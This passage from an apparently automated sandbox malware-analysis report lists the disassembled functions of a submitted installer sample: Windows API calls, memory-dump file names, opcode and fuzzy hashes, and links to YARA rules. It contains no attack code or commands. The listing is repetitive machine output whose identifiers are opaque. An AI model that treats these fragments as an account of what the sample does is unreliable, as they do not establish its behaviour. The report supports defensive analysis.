                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                    • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                    • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                                    • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                    • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                      • Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
                                                                                                                                      • Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                      • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                                                                                      • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                                                                                      • Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
                                                                                                                                      • Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29
                                                                                                                                      • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2972824698-0
                                                                                                                                    • Opcode ID: 9edf40dd620456944a3073f7ecab255b0d78d4833ca7daa8f9e88a8b745076c9
                                                                                                                                    • Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
                                                                                                                                    • Opcode Fuzzy Hash: 9edf40dd620456944a3073f7ecab255b0d78d4833ca7daa8f9e88a8b745076c9
                                                                                                                                    • Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                    • Opcode ID: 93ee68a11940325a9ced04c682ca8caeb947e30f70c8be79a55a08dd3566a10b
                                                                                                                                    • Instruction ID: c44eb66d79cfe4ab40ed370e2c6e06efa86698fbc962cda5fd2e65c0cc136455
                                                                                                                                    • Opcode Fuzzy Hash: 93ee68a11940325a9ced04c682ca8caeb947e30f70c8be79a55a08dd3566a10b
                                                                                                                                    • Instruction Fuzzy Hash: 47D0A773A142008BD700EBF8BE854AF73F8EB403293215C3BD102E11D1E778C901561C
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00403B4F Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00403A82,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B5A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                    • Opcode ID: 3a0e7e5e5cdf62e96be2142a5155a3d8c657aa15ddb96e9066be89a7fa45203e
                                                                                                                                    • Instruction ID: 69482a2579ef2b85c2ad9764c5c762c9eb4f19b2fcf4b87e51b14fafea8afdc0
                                                                                                                                    • Opcode Fuzzy Hash: 3a0e7e5e5cdf62e96be2142a5155a3d8c657aa15ddb96e9066be89a7fa45203e
                                                                                                                                    • Instruction Fuzzy Hash: EDC0123090470496F1206F79AE8FA153A64574073DBA48726B0B8B10F3CB7C5659555D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405779
                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405788
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004057C5
                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004057CC
                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405868
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405889
                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405797
                                                                                                                                      • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004058DB
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004058F0
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405914
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405919
                                                                                                                                    • ShowWindow.USER32(00000008), ref: 00405963
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
                                                                                                                                    • CreatePopupMenu.USER32 ref: 004059A8
                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004059DC
                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405A3D
                                                                                                                                    • EmptyClipboard.USER32 ref: 00405A43
                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405A59
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
                                                                                                                                    • CloseClipboard.USER32 ref: 00405A9E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                    • String ID: {
                                                                                                                                    • API String ID: 590372296-366298937
                                                                                                                                    • Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                                                                    • Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
                                                                                                                                    • Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                                                                    • Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004049C7 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404A16
                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404A40
                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404AFC
                                                                                                                                    • lstrcmpiW.KERNEL32(004326A0,0042CA68,00000000,?,?), ref: 00404B2E
                                                                                                                                    • lstrcatW.KERNEL32(?,004326A0), ref: 00404B3A
                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
                                                                                                                                      • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
                                                                                                                                      • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                                                                      • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                                                                      • Part of subcall function 00406805: CharNextW.USER32(?,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                                                                      • Part of subcall function 00406805: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                                                                                                                      • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                                                                      • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                                                                                                                      • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: A
                                                                                                                                    • API String ID: 2624150263-3554254475
                                                                                                                                    • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                                                                    • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                                                                                                                    • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                                                                    • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405C63 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405C8C
                                                                                                                                    • lstrcatW.KERNEL32(0042EA70,\*.*), ref: 00405CD4
                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405CF7
                                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CFD
                                                                                                                                    • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405D0D
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405DBC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                                                                                                                    • API String ID: 2035342205-1023570929
                                                                                                                                    • Opcode ID: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
                                                                                                                                    • Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
                                                                                                                                    • Opcode Fuzzy Hash: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
                                                                                                                                    • Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004068B4 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(74DF3420,0042FAB8,0042F270,00405F77,0042F270,0042F270,00000000,0042F270,0042F270,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                    • Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                                                                                                    • Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
                                                                                                                                    • Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                                                                                                    • Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004021AF Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInstance
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 542301482-0
                                                                                                                                    • Opcode ID: a90b5541f70cc3965861c320ab0ae6f4864bd50261fd75e99cc6532b3daacbe6
                                                                                                                                    • Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
                                                                                                                                    • Opcode Fuzzy Hash: a90b5541f70cc3965861c320ab0ae6f4864bd50261fd75e99cc6532b3daacbe6
                                                                                                                                    • Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                    • Opcode ID: 5b0fb285c9b4bcb701b5bdc638fb86233a16d4678ca4d14c0689f288dbcc861d
                                                                                                                                    • Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
                                                                                                                                    • Opcode Fuzzy Hash: 5b0fb285c9b4bcb701b5bdc638fb86233a16d4678ca4d14c0689f288dbcc861d
                                                                                                                                    • Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406DC6 Relevance: .3, Instructions: 334COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
